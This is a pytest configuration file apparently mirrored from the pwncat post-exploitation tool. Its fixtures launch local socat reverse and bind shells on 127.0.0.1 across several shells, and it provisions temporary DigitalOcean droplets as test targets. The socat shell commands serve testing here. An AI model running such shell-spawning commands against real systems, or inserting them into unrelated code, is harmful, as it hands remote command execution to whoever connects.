1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-30 12:24:14 +01:00
pwncat/tests/conftest.py
2021-04-10 15:52:47 -04:00

278 lines
7.4 KiB
Python

#!/usr/bin/env python3
import dataclasses
import random
import socket
import string
import time
import os
import digitalocean
import pytest
from xprocess import ProcessStarter
from Crypto.PublicKey import RSA
# Test multiple shells
SHELLS = ["/bin/sh", "/bin/bash", "/usr/bin/dash", "/usr/bin/zsh"]
class LinuxReverseStarter(ProcessStarter):
""" Start an infinite linux reverse shell using socat """
name = "linux_reverse"
pattern = "READY"
args = [
"/bin/sh",
"-c",
"echo READY; socat TCP4:127.0.0.1:{port},retry,forever,fork EXEC:{shell}",
]
timeout = 5
@classmethod
def get_connection_details(cls):
""" Custom method to provide connection details across all starters """
return {
"platform": "linux",
"host": "127.0.0.1",
"port": cls.port,
"protocol": "bind",
}
def startup_check(self):
details = self.get_connection_details()
# with socket.create_server(
# (details["host"], details["port"]), reuse_port=True
# ) as sock:
# client = sock.accept()
return True
class LinuxBindStarter(ProcessStarter):
""" Start an infinite linux bind shell using socat """
name = "linux_bind"
pattern = "READY"
args = [
"/bin/sh",
"-c",
"echo READY; socat TCP4-LISTEN:{port},bind=127.0.0.1,reuseaddr,fork EXEC:{shell}",
]
timeout = 5
@classmethod
def get_connection_details(cls):
""" Return connection details for this method """
return {
"platform": "linux",
"host": "127.0.0.1",
"port": cls.port,
"protocol": "connect",
}
def startup_check(self):
details = self.get_connection_details()
with socket.create_connection((details["host"], details["port"])) as sock:
pass
return True
class LinuxFixtureParam(str):
"""This is a hack to get the names of parameterized fixtures
to have meaning beyond "0", "1", "2", etc. Basically, we create
a new sublass of string, and apply a constant value which we want
to be the name of the parameterized fixture. We also assign members
which contain the process starter and shell path for access by the
fixture itself."""
def __new__(cls, starter, shell):
obj = str.__new__(cls, f"{starter.name}_{os.path.basename(shell)}")
obj.__init__(starter, shell)
return obj
def __init__(self, starter, shell):
self.starter = starter
self.shell = shell
def LinuxEnumShells(starter):
return [LinuxFixtureParam(starter, shell) for shell in SHELLS]
@pytest.fixture(
params=[
*LinuxEnumShells(LinuxReverseStarter),
*LinuxEnumShells(LinuxBindStarter),
]
)
def linux(xprocess, request):
""" Create linux connections available to the pwncat tests """
class Starter(request.param.starter):
shell = request.param.shell
args = request.param.starter.args
# We need to make a copy of the args array, and assign the port
# outside of the class definition to ensure we don't modify the
# class of other fixture parameters by mistake.
Starter.args = request.param.starter.args[:].copy()
Starter.port = random.randint(30000, 60000)
Starter.args[-1] = Starter.args[-1].format(port=Starter.port, shell=Starter.shell)
logfile = xprocess.ensure(str(request.param), Starter)
yield Starter.get_connection_details()
xprocess.getinfo(str(request.param)).terminate()
@pytest.fixture
def session(linux):
import pwncat.manager
with pwncat.manager.Manager(config=None) as manager:
session = manager.create_session(**linux)
yield session
@dataclasses.dataclass
class DigitalOceanFixture(object):
""" Digital Ocean Fixture Data """
ubuntu: digitalocean.Droplet
""" Ubuntu 20.04 droplet instance """
centos: digitalocean.Droplet
""" CentOS 7 droplet instance """
windows: digitalocean.Droplet
""" Windows droplet instance """
user: str
""" Username for initial access """
password: str
""" Password for initial access """
ssh_key: str
""" SSH private key used for auth to Linux servers """
bind_port: int
""" Port where shells are bound on the given servers """
@pytest.fixture
def digital_ocean():
""" Construct digital ocean targets for remote testing """
manager = digitalocean.Manager()
project = [p for p in manager.get_all_projects() if p.name == "pwncat"][0]
unique_name = "test-" + "".join(
random.choices(list(string.ascii_letters + string.digits), k=5)
)
key = RSA.generate(2048)
pubkey = key.publickey()
droplets = []
keys = []
try:
# Create the key
do_key = digitalocean.SSHKey(
name=unique_name, public_key=pubkey.exportKey("OpenSSH").decode("utf-8")
)
do_key.create()
keys.append(do_key)
# Create ubuntu vm
ubuntu = digitalocean.Droplet(
name=unique_name + "-ubuntu",
region="nyc1",
image="ubuntu-20-04-x64",
size_slug="s-1vcpu-1gb",
ssh_keys=[do_key],
backups=False,
)
ubuntu.create()
droplets.append(ubuntu)
# Create centos vm
centos = digitalocean.Droplet(
name=unique_name + "-ubuntu",
region="nyc1",
image="ubuntu-20-04-x64",
size_slug="s-1vcpu-1gb",
ssh_keys=[do_key],
backups=False,
)
centos.create()
droplets.append(centos)
# Create windows vm
windows = digitalocean.Droplet(
name=unique_name + "-ubuntu",
region="nyc1",
image="ubuntu-20-04-x64",
size_slug="s-1vcpu-1gb",
ssh_keys=[do_key],
backups=False,
)
windows.create()
droplets.append(windows)
# Add tag to droplets
tag = digitalocean.Tag(name=unique_name)
tag.create()
tag.add_droplets([ubuntu.id, windows.id, centos.id])
# Wait for droplets to be up
waiting_droplets = droplets.copy()
while waiting_droplets:
for droplet in waiting_droplets:
actions = droplet.get_actions()
for action in droplet.get_actions():
action.load()
if action.status != "completed":
break
else:
droplet.load()
waiting_droplets.remove(droplet)
break
time.sleep(1)
time.sleep(5)
# Wait for SSH to be up on the droplets
while True:
for droplet in droplets:
try:
with socket.create_connection((droplet.ip_address, 22)) as sock:
pass
except socket.error:
break
else:
break
time.sleep(5)
yield DigitalOceanFixture(
ubuntu=ubuntu,
centos=centos,
windows=windows,
user="root",
password="wrong",
ssh_key=key,
bind_port=0,
)
finally:
for droplet in manager.get_all_droplets(tag_name=unique_name):
droplet.destroy()
for do_key in manager.get_all_sshkeys():
if do_key.name == unique_name:
do_key.destroy()